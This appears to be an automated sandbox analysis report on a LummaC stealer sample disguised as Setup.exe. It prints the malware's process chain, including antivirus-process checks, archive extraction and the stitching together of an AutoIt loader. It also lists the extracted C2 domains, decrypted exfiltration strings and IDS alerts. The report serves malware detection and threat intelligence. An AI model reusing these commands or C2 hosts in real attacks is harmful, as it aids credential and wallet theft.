Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1580131
MD5: 588eeb3d8f305fc008f034e10e0015c0
SHA1: 7a77ed807fbea72e7c94295343cf795e864adfae
SHA256: d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
Tags: exe, user-aachum

Detection

LummaC
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Setup.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 588EEB3D8F305FC008F034E10E0015C0)
    • cmd.exe (PID: 2700 cmdline: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3440 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1396 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6224 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3276 cmdline: cmd /c md 280366 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 2684 cmdline: extrac32 /Y /E Agrees MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 5160 cmdline: findstr /V "Travels" Served MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2704 cmdline: cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hc.com (PID: 2128 cmdline: Hc.com I MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 1896 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["manyrestro.lat", "shapestickyr.lat", "slipperyloo.lat", "curverpluch.lat", "hungrypaster.click", "talkynicer.lat", "bashfulacid.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "hRjzG3--GAS"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2700, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6224, ProcessName: findstr.exe

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-24T01:26:37.505366+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP
      2024-12-24T01:26:39.991057+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49737 | 188.114.96.6 | 443 | TCP
      2024-12-24T01:26:38.792709+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP
      2024-12-24T01:26:38.792709+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP

      AV Detection

      Source: 0000000C.00000002.2352426923.0000000001861000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "shapestickyr.lat", "slipperyloo.lat", "curverpluch.lat", "hungrypaster.click", "talkynicer.lat", "bashfulacid.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "hRjzG3--GAS"}
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: tentabatte.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: curverpluch.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: talkynicer.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: manyrestro.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: hungrypaster.click
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: Workgroup: -
      Source: 0000000C.00000003.2306411149.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: hRjzG3--GAS
      Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0068DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0068E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069A570 FindFirstFileW,Sleep,FindNextFileW,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0065C622 FindFirstFileExW
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006966DC FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00697333 FindFirstFileW,FindClose
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0068D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\280366
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\280366\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\

      Networking

      Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49731 -> 188.114.96.6:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49731 -> 188.114.96.6:443
      Source: Malware configuration extractor | URLs: manyrestro.lat
      Source: Malware configuration extractor | URLs: shapestickyr.lat
      Source: Malware configuration extractor | URLs: slipperyloo.lat
      Source: Malware configuration extractor | URLs: curverpluch.lat
      Source: Malware configuration extractor | URLs: hungrypaster.click
      Source: Malware configuration extractor | URLs: talkynicer.lat
      Source: Malware configuration extractor | URLs: bashfulacid.lat
      Source: Malware configuration extractor | URLs: tentabatte.lat
      Source: Malware configuration extractor | URLs: wordyfindy.lat
      Source: Joe Sandbox View | IP Address: 188.114.96.6
      Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 188.114.96.6:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49737 -> 188.114.96.6:443
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: hungrypaster.click
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069D889 InternetReadFile,SetEvent,GetLastError,SetEvent
      Source: global traffic | DNS traffic detected: DNS query: PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
      Source: global traffic | DNS traffic detected: DNS query: hungrypaster.click
      Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: hungrypaster.click
      Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Setup.exe | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Setup.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: Setup.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: Setup.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0A
      Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0C
      Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0X
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Setup.exe | String found in binary or memory: http://ocsps.ssl.com0
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Hc.com, 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Setup.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click/
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001844000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352371273.0000000001815000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click/api
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click/apiX
      Source: Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click/zj
      Source: Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click:443/api
      Source: Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114r
      Source: Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Fw.9.dr | String found in binary or memory: https://www.globalsign.com/repository/0
      Source: Setup.exe | String found in binary or memory: https://www.ssl.com/repository0
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknown | HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0069F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00694763 GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00681B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0068F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
      Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\EngagementRisks
      Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\LordGarmin
      Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\BarcelonaTranny
      Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\LabInterfaces
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_0040737E
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406EFE
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004079A2
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004049A8
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00648017
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0063E144
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0062E1F0
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0065A26E
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006422A2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006222AD
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0063C624
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0065E87F
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006AC8A4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00692A05
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00656ADE
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00688BFF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0063CD7A
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_0064CE10
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00657159
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00629240
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006B5311
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_006296E0
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00641704
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00641A76
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00629B60
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00647B8B
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00641D20
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00647DBA
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 12_2_00641FE7
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\280366\Hc.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 0063FD52 appears 40 times
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 00640DA0 appears 46 times
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062CF appears 58 times
      Source: Setup.exeStatic PE information: invalid certificate
      Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@24/24@2/1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006941FA GetLastError,FormatMessageW,12_2_006941FA
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00682010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00682010
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00681A0B AdjustTokenPrivileges,CloseHandle,12_2_00681A0B
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0068DD87
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00693A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00693A0E
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
      Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsj8DEF.tmp
